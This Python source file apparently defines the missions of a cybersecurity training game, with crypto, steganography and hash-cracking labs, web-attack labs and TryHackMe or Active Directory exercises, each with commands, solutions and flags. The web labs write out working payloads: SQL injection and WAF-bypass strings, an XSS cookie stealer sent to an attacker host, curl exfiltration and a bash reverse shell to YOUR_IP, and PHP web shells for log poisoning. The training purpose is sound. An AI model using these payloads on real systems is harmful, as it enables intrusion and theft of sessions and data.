"""
CyberSim Missions — Phase 2 Months 6-7 (Crypto/Web) + Phase 3 (THM/HTB) + Phase 4 (Career)
Missions 601-909. Uses compact builder from mission_data_p2.
"""
from core.mission_data_p2 import _m, _lab, _theory, DC30, DC45, DC120
from core.mission_types import TYPE_LAB, TYPE_THEORY, TYPE_PROJECT, TYPE_CAREER, TYPE_EXTERNAL

MISSIONS_P3 = {
# ═══ MONTH 6: CRYPTOGRAPHY (Days 151-180) ═══
601: _m(601, "Base64 Decoding", TYPE_LAB, 2,
    easy=_lab("Decode: 'RkxBR3tiYXNlNjRfaXNfbm90X2VuY3J5cHRpb259'. Use echo | base64 -d.",
        "Learn Base64 is encoding, NOT encryption.", ["CLI base64 decode", "Python base64 module", "CyberChef"],
        [("base64", "echo 'RkxBR3t...' | base64 -d", "CLI decode"), ("python", "import base64; base64.b64decode('...')", "Python decode")],
        "STEP 1: echo 'RkxBR3tiYXNlNjRfaXNfbm90X2VuY3J5cHRpb259' | base64 -d\nSTEP 2: Read output → submit flag.",
        "None", "FLAG{base64_is_not_encryption}", 75),
    normal=_lab("Multiple encoding layers: Base64→Hex→ROT13. Peel each layer.",
        "Decode multi-layered encoded string.", ["Identifying encoding type", "Chained decoding", "Frequency analysis"],
        [("CyberChef", "https://gchq.github.io/CyberChef/", "Multi-decoder"), ("xxd", "echo '...' | xxd -r -p", "Hex decode")],
        "STEP 1: Decode base64 first.\nSTEP 2: Result is hex — decode with xxd -r -p.\nSTEP 3: Result is ROT13 — use tr 'A-Za-z' 'N-ZA-Mn-za-m'.\nSTEP 4: Submit flag.",
        "None", "FLAG{mult1_l4y3r_d3c0d3}", 125),
    hard=_lab("Custom encoding scheme with XOR key hidden in metadata. Reverse-engineer the algorithm.",
        "Analyze and reverse a custom encoding algorithm.", ["XOR analysis", "Frequency analysis", "Known-plaintext attack"],
        [("xortool", "xortool -l 4 ciphertext.bin", "XOR key length detection"), ("python", "python3 xor_decrypt.py", "Custom decryptor")],
        "STEP 1: Examine the encoded data — not standard base64.\nSTEP 2: Use xortool to detect key length.\nSTEP 3: Known plaintext 'FLAG{' helps find key.\nSTEP 4: XOR decrypt with discovered key. Submit flag.",
        "None", "FLAG{cust0m_x0r_cr4ck}", 200)),

602: _m(602, "Caesar Cipher", TYPE_LAB, 2,
    easy=_lab("Ciphertext: 'IODJ{fdhvdu_flskhu_lq_dfwlrq}'. Shift=3. Shift back to decrypt.",
        "Break a classic substitution cipher.", ["Letter shifting", "Brute force 26 shifts", "Python ord()/chr()"],
        [("tr", "echo 'IODJ...' | tr 'D-ZA-Cd-za-c' 'A-Za-z'", "Shift back by 3"), ("python", "chr((ord(c)-65-3)%26+65)", "Python shift")],
        "STEP 1: Each letter shifted +3. A→D, B→E, etc.\nSTEP 2: Shift back by 3: D→A, E→B.\nSTEP 3: I→F, O→L, D→A, J→G = FLAG\nSTEP 4: Full decode → submit flag.",
        "None", "FLAG{caesar_cipher_in_action}", 75),
    normal=_lab("Unknown shift value. Frequency analysis to determine the shift.",
        "Use letter frequency to crack unknown Caesar shift.", ["Frequency analysis", "Common English letters (ETAOIN)", "Brute force"],
        [("bruteforce", "for i in range(26): print(decrypt(text,i))", "Try all 26 shifts")],
        "STEP 1: Count letter frequencies in ciphertext.\nSTEP 2: Most common letter in English is E.\nSTEP 3: Most common in cipher → calculate shift.\nSTEP 4: Or brute force all 26 shifts. Submit flag.",
        "None", "FLAG{fr3qu3ncy_4n4lys1s}", 125),
    hard=_lab("Polyalphabetic cipher (Vigenère). Multiple shifts based on keyword.",
        "Crack Vigenère cipher using Kasiski examination.", ["Kasiski examination", "Index of Coincidence", "Key length detection"],
        [("vigenere", "python3 vigenere_crack.py ciphertext.txt", "Auto-crack tool"), ("kasiski", "Find repeated trigrams, GCD of distances", "Key length")],
        "STEP 1: This is NOT simple Caesar — multiple shifts.\nSTEP 2: Find repeated sequences → GCD = key length.\nSTEP 3: Split into groups by key position.\nSTEP 4: Apply frequency analysis to each group.\nSTEP 5: Reconstruct key and decrypt. Submit flag.",
        "None", "FLAG{v1g3n3r3_cr4ck3d}", 200)),

603: _m(603, "Magic Bytes & File Forensics", TYPE_LAB, 2,
    easy=_lab("File has .txt extension but hex bytes are 'FF D8 FF E0'. What is it really?",
        "Identify file types by magic bytes/file signatures.", ["file command", "xxd hex dump", "Magic bytes database"],
        [("file", "file mystery.txt", "Auto-detect file type"), ("xxd", "xxd mystery.txt | head -1", "View magic bytes")],
        "STEP 1: file mystery.txt → reports JPEG image.\nSTEP 2: xxd mystery.txt | head → FF D8 FF E0 = JPEG.\nSTEP 3: Rename: mv mystery.txt mystery.jpg\nSTEP 4: Open the image — flag is visible. Submit 'jpeg'.",
        "None", "jpeg", 75),
    normal=_lab("Multiple files with wrong extensions. Identify all, one contains a hidden ZIP with the flag.",
        "Sort files by real type, extract hidden archive.", ["Bulk file identification", "binwalk for embedded files", "unzip hidden archives"],
        [("file *", "file *", "Identify all files"), ("binwalk", "binwalk -e suspicious_file", "Extract embedded files")],
        "STEP 1: file * → identify real types.\nSTEP 2: One file has ZIP embedded — binwalk -e to extract.\nSTEP 3: unzip extracted archive.\nSTEP 4: Flag inside. Submit.",
        "None", "FLAG{h1dd3n_z1p_f0und}", 125),
    hard=_lab("Steganography: flag hidden in image using LSB encoding. Extract using steghide/zsteg.",
        "Extract hidden data from image files.", ["LSB steganography", "steghide", "zsteg for PNG", "Entropy analysis"],
        [("steghide", "steghide extract -sf image.jpg -p ''", "Extract with empty password"), ("zsteg", "zsteg image.png", "PNG stego analysis")],
        "STEP 1: file/binwalk show nothing unusual.\nSTEP 2: Try steghide: steghide extract -sf image.jpg\nSTEP 3: If password needed, try common/empty.\nSTEP 4: For PNG: zsteg image.png -a\nSTEP 5: Extracted data contains flag. Submit.",
        "None", "FLAG{st3g0_lsb_3xtr4ct}", 200)),

604: _m(604, "Encryption Theory", TYPE_THEORY, 2,
    _theory("Symmetric vs Asymmetric encryption fundamentals.", "Learn AES, RSA, key exchange, and PKI.",
        ["Symmetric: Same key encrypts/decrypts (AES, DES, 3DES)", "Asymmetric: Public/private keypair (RSA, ECC)",
         "Key exchange: Diffie-Hellman", "PKI: Certificate Authorities, X.509 certificates"],
        "1. AES: openssl enc -aes-256-cbc -in file -out file.enc\n2. RSA: openssl genrsa -out key.pem 2048\n3. Understand: Why is RSA slow? (Math on large primes)\n4. Hybrid encryption: RSA encrypts AES key, AES encrypts data.",
        [("AES key size options?", "128 192 256"), ("RSA is based on?", "prime factorization")], 50),
    _theory("Attacking cryptography — weak implementations and side-channel attacks.", "Find crypto weaknesses.",
        ["Weak key generation (predictable seeds)", "Padding oracle attacks", "Birthday attacks on hashes", "Side-channel: timing attacks"],
        "1. Study: Why is ECB mode insecure? (Identical blocks = identical ciphertext)\n2. Research padding oracle: How does it leak plaintext?\n3. Understand birthday paradox: 50% collision at sqrt(keyspace).\n4. Timing attack: measure response time to guess secrets.",
        [("Insecure AES block mode?", "ecb"), ("Attack exploiting timing differences?", "side channel")], 75),
    _theory("Expert crypto — implementing and breaking real-world crypto.", "Build and break cryptographic systems.",
        ["RSA math: n=p*q, e*d≡1(mod φ(n))", "Elliptic curve basics", "Quantum threats to RSA", "Post-quantum cryptography"],
        "1. Implement RSA from scratch in Python.\n2. Factor weak RSA: if n is small, use factordb.com.\n3. Study: How will quantum computers break RSA? (Shor's algorithm)\n4. Research post-quantum: Lattice-based, hash-based signatures.",
        [("RSA: n = ?", "p times q"), ("Quantum algorithm that breaks RSA?", "shor")], 100)),

605: _m(605, "Hash Cracking", TYPE_LAB, 2,
    easy=_lab("Crack MD5 hash from /etc/shadow using John the Ripper and rockyou.txt wordlist.",
        "Learn password hash cracking fundamentals.", ["John the Ripper", "hashcat", "Wordlist attacks"],
        [("john", "john --wordlist=/usr/share/wordlists/rockyou.txt shadow.txt", "Crack with wordlist"),
         ("hashcat", "hashcat -m 500 hash.txt rockyou.txt", "GPU-accelerated cracking")],
        "STEP 1: Copy shadow: unshadow /etc/passwd /etc/shadow > combined.txt\nSTEP 2: john --wordlist=/usr/share/wordlists/rockyou.txt combined.txt\nSTEP 3: Wait for crack → john --show combined.txt\nSTEP 4: Submit cracked password as flag.",
        "None", "FLAG{j0hn_cr4ck3d_md5}", 100),
    normal=_lab("SHA-512 hash with salt. Use rules and hybrid attacks.",
        "Apply advanced cracking techniques for stronger hashes.", ["Rule-based attacks", "Hybrid wordlist+mask", "Rainbow tables"],
        [("rules", "john --wordlist=rockyou.txt --rules hash.txt", "Apply mutation rules"),
         ("hashcat hybrid", "hashcat -m 1800 -a 6 hash.txt rockyou.txt '?d?d?d'", "Wordlist + 3 digits")],
        "STEP 1: Identify hash type: hashid or hash-identifier.\nSTEP 2: SHA-512: hashcat -m 1800 or john --format=sha512crypt.\nSTEP 3: Add rules: --rules=best64 for word mutations.\nSTEP 4: Try hybrid: password + numbers.\nSTEP 5: Submit flag.",
        "Rate limiting on auth attempts.", "FLAG{rul3_b4s3d_cr4ck}", 150, defender_config=DC45),
    hard=_lab("bcrypt hash with high cost factor. Optimize cracking strategy.",
        "Crack computationally expensive hashes efficiently.", ["GPU optimization", "Targeted wordlist", "OSINT for password hints", "Prince attack"],
        [("hashcat bcrypt", "hashcat -m 3200 -w 3 hash.txt custom_wordlist.txt", "Optimized bcrypt"),
         ("cewl", "cewl https://target.com -w custom.txt", "Build targeted wordlist from website")],
        "STEP 1: bcrypt is SLOW — brute force won't work.\nSTEP 2: Build targeted wordlist: cewl the target website.\nSTEP 3: Add company name, year, common patterns.\nSTEP 4: Use prince attack for password combinations.\nSTEP 5: Submit flag.",
        "Anti-brute-force active.", "FLAG{bcrypt_t4rg3t3d_cr4ck}", 200, defender_config=DC120)),

606: _m(606, "Advanced Steganography", TYPE_LAB, 2,
    easy=_lab("Extract a hidden ZIP inside a WAV audio file using binwalk.",
        "Learn audio steganography basics.", ["binwalk extraction", "Audacity spectrum analysis", "file carving"],
        [("binwalk", "binwalk -e audio.wav", "Extract embedded files"), ("audacity", "Audacity → Spectrogram view", "Visual analysis")],
        "STEP 1: binwalk audio.wav → shows embedded ZIP.\nSTEP 2: binwalk -e audio.wav to extract.\nSTEP 3: unzip extracted archive.\nSTEP 4: Flag inside. Submit.", "None", "FLAG{4ud10_st3g0_b4s1c}", 100),
    normal=_lab("Data hidden in audio frequency spectrum. Use Audacity spectrogram view.",
        "Detect spectral steganography in audio.", ["Spectrogram analysis", "FFT frequency analysis", "SSTV decoding"],
        [("audacity", "Audacity → View → Spectrogram", "Switch to spectrogram"), ("sox", "sox audio.wav -n spectrogram", "CLI spectrogram")],
        "STEP 1: Open in Audacity, switch to Spectrogram view.\nSTEP 2: Look for text/patterns in high frequencies.\nSTEP 3: The flag is written in the spectrogram.\nSTEP 4: Submit flag.", "None", "FLAG{sp3ctr0gr4m_h1dd3n}", 150),
    hard=_lab("Multi-layer stego: image inside audio, text inside image, using multiple tools.",
        "Chain multiple stego extraction techniques.", ["Multi-format stego chains", "Custom scripts", "Entropy analysis"],
        [("stegsolve", "java -jar stegsolve.jar", "Image stego solver"), ("sonic-visualiser", "sonic-visualiser audio.wav", "Advanced audio analysis")],
        "STEP 1: Extract image from audio using binwalk.\nSTEP 2: Analyze image with stegsolve/zsteg.\nSTEP 3: Extract text from image LSB.\nSTEP 4: Decode extracted text (may be encoded).\nSTEP 5: Submit flag.",
        "None", "FLAG{mult1_l4y3r_st3g0}", 200)),

607: _m(607, "TLS/SSL & PKI Theory", TYPE_THEORY, 2,
    _theory("How TLS secures web traffic.", "Learn TLS handshake, certificates, and HTTPS.",
        ["TLS handshake: ClientHello→ServerHello→Certificate→KeyExchange→Finished",
         "Certificate chain: Root CA → Intermediate → Server cert", "HTTPS: HTTP over TLS", "Certificate pinning"],
        "1. Use openssl to inspect: openssl s_client -connect google.com:443\n2. View cert: openssl x509 -in cert.pem -text\n3. Check cert chain in browser: padlock → Certificate.\n4. Understand: What does the CA verify?",
        [("Default HTTPS port?", "443"), ("Tool to test SSL?", "openssl s_client")], 50),
    _theory("TLS attacks and misconfigurations.", "Identify SSL/TLS vulnerabilities.",
        ["BEAST, POODLE, DROWN, Heartbleed attacks", "SSLStrip / HSTS bypass", "Certificate transparency monitoring", "Weak cipher suites"],
        "1. Test with testssl.sh: ./testssl.sh https://target.com\n2. Check for Heartbleed: nmap --script ssl-heartbleed\n3. Understand SSLStrip: downgrades HTTPS to HTTP.\n4. HSTS prevents SSLStrip — but only after first visit.",
        [("OpenSSL memory leak vulnerability?", "heartbleed"), ("Downgrades HTTPS to HTTP?", "sslstrip")], 75),
    _theory("Expert TLS — protocol internals and advanced attacks.", "Deep TLS protocol understanding.",
        ["TLS 1.3 differences (0-RTT, removed RSA key exchange)", "mTLS (mutual TLS)", "ESNI/ECH for privacy", "TLS fingerprinting (JA3/JA3S)"],
        "1. Compare TLS 1.2 vs 1.3 handshake.\n2. Implement mTLS between client and server.\n3. JA3 fingerprinting: identify clients by TLS parameters.\n4. Study: How does ECH hide the SNI?",
        [("TLS fingerprinting hash?", "ja3"), ("TLS 1.3 removed which key exchange?", "rsa")], 100)),

# ═══ MONTH 7: WEB SECURITY (Days 181-210) ═══
701: _m(701, "OWASP Top 10 Theory", TYPE_THEORY, 2,
    _theory("The OWASP Top 10 — most critical web vulnerabilities.", "Learn all 10 categories.",
        ["A01: Broken Access Control", "A02: Cryptographic Failures", "A03: Injection (SQLi, XSS, CMDi)",
         "A04: Insecure Design", "A05: Security Misconfiguration", "A06: Vulnerable Components",
         "A07: Auth Failures", "A08: Data Integrity", "A09: Logging Failures", "A10: SSRF"],
        "1. Read: https://owasp.org/Top10/\n2. For each: understand the vulnerability, see examples, know defenses.\n3. Practice on DVWA or WebGoat.\n4. Study real-world breaches for each category.",
        [("Most critical OWASP category?", "broken access control"), ("What is SSRF?", "server side request forgery")], 50),
    _theory("Deep dive into each OWASP category with exploitation examples.", "Hands-on OWASP exploitation.",
        ["SQLi types: Union, Boolean-blind, Time-blind, Error-based", "XSS types: Reflected, Stored, DOM-based",
         "IDOR: Insecure Direct Object References", "SSRF: Internal service discovery"],
        "1. Practice SQLi: ' OR 1=1--, ' UNION SELECT null,version()--\n2. XSS payloads: <script>alert(1)</script>, <img onerror=alert(1)>\n3. IDOR: Change user_id=1 to user_id=2 in URL.\n4. SSRF: http://internal-server/admin via vulnerable URL parameter.",
        [("Blind SQLi uses what to detect?", "time delay"), ("XSS that persists in database?", "stored")], 75),
    _theory("Expert web security — chaining vulns and WAF bypass.", "Advanced multi-vector web attacks.",
        ["Chaining: SSRF→file read→credential theft→RCE", "WAF bypass techniques for SQLi/XSS",
         "Prototype pollution", "Deserialization attacks (Java, PHP, Python)"],
        "1. Chain: Find SSRF → read /etc/passwd → crack hashes → SSH.\n2. WAF bypass: sElEcT (mixed case), /*!UNION*/ (MySQL comments).\n3. Study deserialization: ysoserial for Java, pickle for Python.\n4. Research real-world bug bounty reports on HackerOne.",
        [("Java deserialization tool?", "ysoserial"), ("Python dangerous deserialization?", "pickle")], 100)),

702: _m(702, "Burp Suite Mastery", TYPE_LAB, 2,
    docker_image="web_victim", container="cybersim_web_victim",
    easy=_lab("Configure Burp Proxy, intercept a login request, use Repeater for SQL auth bypass.",
        "Learn Burp Suite basics for web testing.", ["Proxy configuration", "Intercepting requests", "Repeater for testing"],
        [("burp proxy", "Configure browser: 127.0.0.1:8080", "Set up proxy"),
         ("intercept", "Proxy → Intercept → Forward/Drop", "Control requests"),
         ("repeater", "Right-click → Send to Repeater", "Modify and resend")],
        "STEP 1: Start Burp Suite, go to Proxy tab.\nSTEP 2: Configure browser proxy: 127.0.0.1:8080\nSTEP 3: Visit target login page.\nSTEP 4: Intercept the login POST.\nSTEP 5: Send to Repeater → modify username to: ' OR 1=1--\nSTEP 6: Send request → check response for flag.",
        "None", "FLAG{burp_1nt3rc3pt_34sy}", 100),
    normal=_lab("Use Intruder for credential testing and Scanner for auto-detection.",
        "Advanced Burp features for systematic testing.", ["Intruder for brute force", "Scanner for auto-vuln detection", "Decoder/Comparer"],
        [("intruder", "Right-click → Send to Intruder → set payload positions", "Brute force"),
         ("scanner", "Right-click → Scan", "Auto vulnerability scan")],
        "STEP 1: Capture login request → Send to Intruder.\nSTEP 2: Set payload position on password field.\nSTEP 3: Load wordlist → Start attack.\nSTEP 4: Find successful login by response length.\nSTEP 5: Submit flag.",
        "Rate limiting on login.", "FLAG{burp_1ntrud3r_pr0}", 150, defender_config=DC30),
    hard=_lab("Target has CSRF tokens and anti-automation. Use Burp macros and session handling.",
        "Bypass anti-automation protections.", ["Burp Macros for token refresh", "Session handling rules", "Custom extensions"],
        [("macro", "Project Options → Sessions → Add Macro", "Auto-refresh CSRF token"),
         ("extension", "Extender → BApp Store", "Install Burp extensions")],
        "STEP 1: Login has CSRF token that changes every request.\nSTEP 2: Set up Burp Macro to fetch new token before each attempt.\nSTEP 3: Configure Session Handling Rule to use the macro.\nSTEP 4: Now Intruder auto-refreshes tokens.\nSTEP 5: Submit flag.",
        "Active WAF, CSRF, rate limiting.", "FLAG{burp_m4cr0_3l1t3}", 200, defender_config=DC120)),

703: _m(703, "SQL Injection", TYPE_LAB, 2,
    docker_image="web_victim", container="cybersim_web_victim",
    easy=_lab("Bypass login using ' OR '1'='1. Extract admin password hash from database.",
        "Learn basic SQL injection.", ["Auth bypass", "UNION SELECT", "sqlmap automation"],
        [("auth bypass", "Username: ' OR 1=1-- Password: anything", "Login bypass"),
         ("union", "' UNION SELECT null,version()--", "Extract DB version"),
         ("sqlmap", "sqlmap -u 'http://target/login' --forms --dbs", "Auto-exploit")],
        "STEP 1: Try: ' OR '1'='1 as username.\nSTEP 2: Login bypassed! Extract data with UNION.\nSTEP 3: ' UNION SELECT null,table_name FROM information_schema.tables--\nSTEP 4: Find users table → extract passwords.\nSTEP 5: Submit flag.",
        "None", "FLAG{sql_1nj3ct10n_byp4ss}", 100),
    normal=_lab("WAF blocks common payloads. Use encoding and alternative syntax.",
        "Bypass WAF for SQL injection.", ["Case variation", "URL encoding", "Comment insertion", "Alternative functions"],
        [("encoded", "' %55NION %53ELECT null,version()--", "URL-encoded UNION SELECT"),
         ("comment", "' UN/**/ION SE/**/LECT null,version()--", "Comment-based bypass")],
        "STEP 1: ' OR 1=1-- is BLOCKED by WAF.\nSTEP 2: Try: ' oR 1=1-- (case variation).\nSTEP 3: Try: ' UNION/**/SELECT null-- (comment insertion).\nSTEP 4: Try URL encoding: %27%20OR%201=1--\nSTEP 5: Submit flag.",
        "WAF active, basic payloads blocked.", "FLAG{w4f_byp4ss_sql1}", 150, defender_config=DC45),
    hard=_lab("Blind SQLi only — no visible output. Use time-based techniques.",
        "Exploit blind SQL injection.", ["Time-based blind", "Boolean-based blind", "Out-of-band exfiltration"],
        [("time-based", "' OR IF(1=1,SLEEP(5),0)-- -", "5 second delay = true"),
         ("boolean", "' OR SUBSTRING(version(),1,1)='5'--", "True/false responses"),
         ("sqlmap blind", "sqlmap -u 'url' --technique=T --level=5", "Auto blind SQLi")],
        "STEP 1: No error messages, no visible output.\nSTEP 2: Time-based: ' OR IF(1=1,SLEEP(5),0)-- (page delays = injectable!)\nSTEP 3: Extract data character by character.\nSTEP 4: ' OR IF(SUBSTRING(password,1,1)='a',SLEEP(5),0)--\nSTEP 5: Script the extraction with Python. Submit flag.",
        "Active Defender — blocks sqlmap, logs injection attempts.",
        "FLAG{bl1nd_sql1_t1m3_b4s3d}", 200, defender_config=DC120)),

704: _m(704, "Cross-Site Scripting (XSS)", TYPE_LAB, 2,
    docker_image="web_victim", container="cybersim_web_victim",
    easy=_lab("Inject stored XSS that steals admin's session cookie.",
        "Learn XSS fundamentals.", ["Reflected XSS", "Stored XSS", "Cookie theft"],
        [("basic", "<script>alert('XSS')</script>", "Basic XSS test"),
         ("cookie", "<script>document.location='http://attacker/steal?c='+document.cookie</script>", "Cookie stealer")],
        "STEP 1: Find input field (comment box, profile, etc.).\nSTEP 2: Enter: <script>alert('XSS')</script>\nSTEP 3: If alert pops → XSS confirmed.\nSTEP 4: Steal cookie: <script>new Image().src='http://YOUR_IP:8888/?c='+document.cookie</script>\nSTEP 5: Start listener: nc -lvnp 8888\nSTEP 6: When admin visits page → you get their cookie! Submit flag.",
        "None", "FLAG{xss_st0r3d_4tt4ck}", 100),
    normal=_lab("Input is filtered. Bypass with encoding and event handlers.",
        "Bypass XSS filters.", ["Event handler XSS", "SVG/IMG tag injection", "JavaScript encoding"],
        [("img", "<img src=x onerror=alert(1)>", "Image error handler"), ("svg", "<svg onload=alert(1)>", "SVG handler")],
        "STEP 1: <script> tag is filtered.\nSTEP 2: Try: <img src=x onerror=alert(1)>\nSTEP 3: Try: <svg onload=alert(1)>\nSTEP 4: Try encoding: &#x3c;script&#x3e;\nSTEP 5: Submit flag.",
        "XSS filter active.", "FLAG{x55_f1lt3r_byp4ss}", 150, defender_config=DC45),
    hard=_lab("CSP (Content Security Policy) blocks inline scripts. Bypass with JSONP or CSP misconfiguration.",
        "Bypass Content Security Policy.", ["CSP analysis", "JSONP callback abuse", "Script src whitelist bypass"],
        [("csp check", "curl -sI http://target | grep Content-Security", "Check CSP header"),
         ("jsonp", "<script src='https://whitelisted.com/jsonp?callback=alert'></script>", "JSONP bypass")],
        "STEP 1: CSP blocks inline scripts: script-src 'self'.\nSTEP 2: Find whitelisted domains in CSP.\nSTEP 3: If JSONP endpoint exists on whitelisted domain → inject via callback.\nSTEP 4: Or find: script-src with 'unsafe-eval' → use eval().\nSTEP 5: Submit flag.",
        "CSP enabled, WAF active.", "FLAG{csp_byp4ss_3l1t3}", 200, defender_config=DC120)),

705: _m(705, "Command Injection", TYPE_LAB, 2,
    docker_image="web_victim", container="cybersim_web_victim",
    easy=_lab("A 'Ping IP' web feature is vulnerable. Inject commands after the IP.",
        "Learn OS command injection.", ["Semicolon chaining", "Pipe injection", "Backtick execution"],
        [("semicolon", "127.0.0.1; cat /etc/passwd", "Chain commands"), ("pipe", "127.0.0.1 | whoami", "Pipe output")],
        "STEP 1: Enter in ping field: 127.0.0.1\nSTEP 2: Try: 127.0.0.1; whoami\nSTEP 3: If you see username → command injection confirmed!\nSTEP 4: 127.0.0.1; cat /flag.txt\nSTEP 5: Submit flag.",
        "None", "FLAG{cmd_1nj3ct10n_34sy}", 100),
    normal=_lab("Semicolons and pipes are filtered. Use alternative separators.",
        "Bypass command injection filters.", ["Newline injection", "$(command) substitution", "Backtick execution"],
        [("newline", "127.0.0.1%0awhoami", "URL-encoded newline"),
         ("subst", "127.0.0.1$(whoami)", "Command substitution")],
        "STEP 1: ; and | are filtered.\nSTEP 2: Try newline: 127.0.0.1%0awhoami\nSTEP 3: Try: $(cat /flag.txt)\nSTEP 4: Try backticks: `whoami`\nSTEP 5: Submit flag.",
        "Input filter on common separators.", "FLAG{f1lt3r_byp4ss_cmd1}", 150, defender_config=DC45),
    hard=_lab("Blind command injection — no output. Use time delays and out-of-band data exfiltration.",
        "Exploit blind command injection.", ["Time-based detection", "DNS/HTTP exfiltration", "Reverse shell"],
        [("time", "127.0.0.1; sleep 5", "5s delay = injectable"),
         ("exfil", "127.0.0.1; curl http://YOUR_IP:8888/$(cat /flag.txt)", "HTTP exfil"),
         ("revshell", "127.0.0.1; bash -i >& /dev/tcp/YOUR_IP/4444 0>&1", "Reverse shell")],
        "STEP 1: No output visible — blind injection.\nSTEP 2: Time-based: 127.0.0.1; sleep 5 (page delays = injectable!)\nSTEP 3: Exfiltrate: curl http://YOUR_IP:8888/$(cat /flag.txt | base64)\nSTEP 4: Or get reverse shell for full access.\nSTEP 5: Submit flag.",
        "Active Defender — blocks known reverse shell patterns.",
        "FLAG{bl1nd_cmd1_3xf1l}", 200, defender_config=DC120)),

706: _m(706, "LFI to RCE", TYPE_LAB, 2,
    docker_image="web_victim", container="cybersim_web_victim",
    easy=_lab("Local File Inclusion: read /etc/passwd via ../../../../etc/passwd in URL parameter.",
        "Learn LFI basics.", ["Directory traversal", "Null byte bypass", "Wrapper filters"],
        [("lfi", "http://target/?page=../../../../etc/passwd", "Basic LFI"),
         ("null byte", "http://target/?page=../../../../etc/passwd%00", "Null byte bypass")],
        "STEP 1: Find URL parameter: ?page=about\nSTEP 2: Try: ?page=../../../../etc/passwd\nSTEP 3: If you see passwd file → LFI confirmed!\nSTEP 4: Read flag: ?page=../../../../flag.txt\nSTEP 5: Submit flag.",
        "None", "FLAG{lf1_b4s1c_r34d}", 100),
    normal=_lab("Path traversal filtered. Use PHP wrappers and encoding to bypass.",
        "Bypass LFI filters using PHP wrappers.", ["PHP filter wrapper", "base64 encoding wrapper", "data:// wrapper"],
        [("php filter", "?page=php://filter/convert.base64-encode/resource=index.php", "Read source code"),
         ("data", "?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjJ10pOyA/Pg==", "Inject PHP code")],
        "STEP 1: ../ is filtered.\nSTEP 2: Use wrapper: ?page=php://filter/convert.base64-encode/resource=config.php\nSTEP 3: Decode base64 → read source code with DB credentials.\nSTEP 4: Use data:// wrapper for code execution.\nSTEP 5: Submit flag.",
        "Path traversal filter active.", "FLAG{php_wr4pp3r_lf1}", 150, defender_config=DC45),
    hard=_lab("LFI to RCE: Poison Apache log to achieve Remote Code Execution.",
        "Chain LFI with log poisoning for RCE.", ["Log poisoning", "User-Agent injection", "Session file inclusion"],
        [("poison", "curl -A '<?php system($_GET[\"c\"]); ?>' http://target/", "Inject PHP in User-Agent"),
         ("execute", "?page=../../../../var/log/apache2/access.log&c=id", "Execute via log inclusion")],
        "STEP 1: Inject PHP into User-Agent: curl -A '<?php system($_GET[c]); ?>' http://target/\nSTEP 2: Include the log: ?page=../../../../var/log/apache2/access.log&c=id\nSTEP 3: Your injected PHP executes! You have RCE.\nSTEP 4: Read flag: &c=cat /flag.txt\nSTEP 5: Submit flag.",
        "Active Defender — monitors log files, blocks rapid inclusion attempts.",
        "FLAG{l0g_p01s0n_rc3_3l1t3}", 200, defender_config=DC120)),

# ═══ PHASE 3: THM/HTB (Days 211-270) ═══
801: _m(801, "TryHackMe Junior Pentester", TYPE_EXTERNAL, 3,
    _lab("Complete the TryHackMe Junior Pentester Path — introductory web hacking rooms.",
        "Work through guided hacking rooms on TryHackMe.", ["Web enumeration", "Burp Suite basics", "Authentication attacks"],
        [("thm", "https://tryhackme.com/path/outline/jrpenetrationtester", "Junior Pentester path")],
        "STEP 1: Sign up at tryhackme.com (free).\nSTEP 2: Join the Junior Pentester path.\nSTEP 3: Complete rooms in order.\nSTEP 4: Submit each room's flag.\nSTEP 5: Come back and submit completion flag.",
        "None — External platform.", "FLAG{thm_jr_p3nt3st3r_34sy}", 75),
    _lab("Complete rooms without using hints. Document your methodology.",
        "Develop independent problem-solving skills.", ["Methodology development", "Note-taking (CherryTree/Obsidian)", "Report writing"],
        [("thm", "https://tryhackme.com", "THM platform"), ("notes", "CherryTree or Obsidian", "Documentation tools")],
        "STEP 1: Complete rooms without hints.\nSTEP 2: Document every step in CherryTree.\nSTEP 3: Write mini-reports for each room.\nSTEP 4: Submit flag.",
        "No hints allowed.", "FLAG{thm_n0_h1nts_pr0}", 125),
    _lab("Complete rooms in under time limit. Speed-run pentesting methodology.",
        "Fast, efficient pentesting under time pressure.", ["Time-boxing", "Parallel enumeration", "Quick wins first"],
        [("time", "time ./enumerate.sh target", "Time your approach")],
        "STEP 1: Set 45-minute timer per room.\nSTEP 2: Run enumeration scripts in parallel.\nSTEP 3: Check low-hanging fruit first.\nSTEP 4: Document speed and submit flag.",
        "Time pressure.", "FLAG{thm_sp33drun_3l1t3}", 200)),

802: _m(802, "THM Offensive Pentesting", TYPE_EXTERNAL, 3,
    _lab("Focus on Active Directory basics — Kerbrute, Impacket, BloodHound.",
        "Learn enterprise network pentesting.", ["AD enumeration", "Kerberos attacks", "Lateral movement"],
        [("bloodhound", "bloodhound-python -c all -d domain.local", "AD enumeration"),
         ("kerbrute", "kerbrute userenum users.txt -d domain.local", "Username enumeration")],
        "STEP 1: Complete THM AD rooms.\nSTEP 2: Learn BloodHound for AD mapping.\nSTEP 3: Practice Kerberoasting.\nSTEP 4: Submit flag.", "None", "FLAG{4d_b4s1cs_34sy}", 100),
    _lab("Exploit AD misconfigurations without guided hints.", "Independent AD exploitation.",
        ["AS-REP Roasting", "Pass-the-Hash", "DCSync"], [("impacket", "GetNPUsers.py domain/ -usersfile users.txt", "AS-REP Roast")],
        "STEP 1: Enumerate users: kerbrute.\nSTEP 2: AS-REP Roast: GetNPUsers.py.\nSTEP 3: Crack tickets: hashcat -m 18200.\nSTEP 4: Submit flag.",
        "No hints.", "FLAG{4d_3xpl01t_pr0}", 150),
    _lab("Full AD compromise chain: initial access → DC admin.", "Complete AD attack chain.",
        ["Golden Ticket", "Silver Ticket", "Trust abuse"], [("secretsdump", "secretsdump.py domain/admin@DC", "Dump all hashes")],
        "STEP 1: Initial foothold via web app.\nSTEP 2: Enumerate with BloodHound.\nSTEP 3: Kerberoast → crack → lateral move.\nSTEP 4: DCSync → Golden Ticket → Domain Admin.\nSTEP 5: Submit flag.",
        "Active monitoring.", "FLAG{d0m41n_4dm1n_3l1t3}", 200)),

803: _m(803, "Independent THM Challenge Boxes", TYPE_EXTERNAL, 3,
    _lab("Complete 5 Easy-rated THM rooms without write-ups.", "Test your skills independently.",
        ["Enumeration methodology", "Exploitation techniques", "Post-exploitation"],
        [("thm", "https://tryhackme.com", "Pick Easy rooms")],
        "STEP 1: Choose 5 Easy rooms (NOT in any path).\nSTEP 2: Complete without guides.\nSTEP 3: Submit flags.", "None", "FLAG{thm_1nd3p_34sy}", 100),
